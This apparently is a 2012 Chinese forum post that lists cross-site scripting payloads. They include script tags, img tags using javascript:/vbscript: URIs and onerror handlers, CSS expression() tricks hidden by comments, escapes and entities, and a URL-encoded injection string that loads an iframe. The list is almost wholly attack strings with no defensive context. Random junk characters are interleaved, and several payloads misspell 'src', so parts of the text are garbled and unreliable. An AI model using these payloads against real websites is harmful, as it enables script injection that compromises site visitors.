<script>alert("跨站")</script> (最常用)
+ R% D: k3 ?% n: [. G/ B<img scr=javascript:alert("跨站")></img>
- {. T7 I- i1 n) k<img scr="javascript: alert(/跨站/)></img>- S1 |3 B u8 j) g! |
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
# N# G ~* p$ p- w. F6 J! s<img scr="#" onerror=alert(/跨站/)></img>
: o, i& j3 N D# D- T<img scr="#" style="xss:expression(alert(/xss/));"></img>
2 [0 j& D- l+ z6 J, K2 a9 L# y6 ?. |<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)5 T9 Y7 r4 z' y% l8 h" L
<img src=vbscript:msgbox ("xss")></img>
3 l+ h# o7 N$ x, v<style> input {left:expression (alert('xss'))}</style>7 H! a& ~, _. b
<div style={left:expression (alert('xss'))}></div>
8 Q( b8 g( B+ P4 A<div style={left:exp/* */ression (alert('xss'))}></div>
, ~# w. ^/ S: b' t% @<div style={left:\0065\0078ression (alert('xss'))}></div>. \6 C; r/ v( P; R
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
( [7 Y, `9 T% U) J6 Runicode <div style="{left:expRessioN (alert('xss'))}">0 S# y+ C7 I; z0 m& V* ]
. a- _* m, _. P/ }, L# \+ l$ a"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
3 O) _0 ^5 k- `2 F" K% r& { |
发表于 2012-9-13 17:15:04
收藏
支持
反对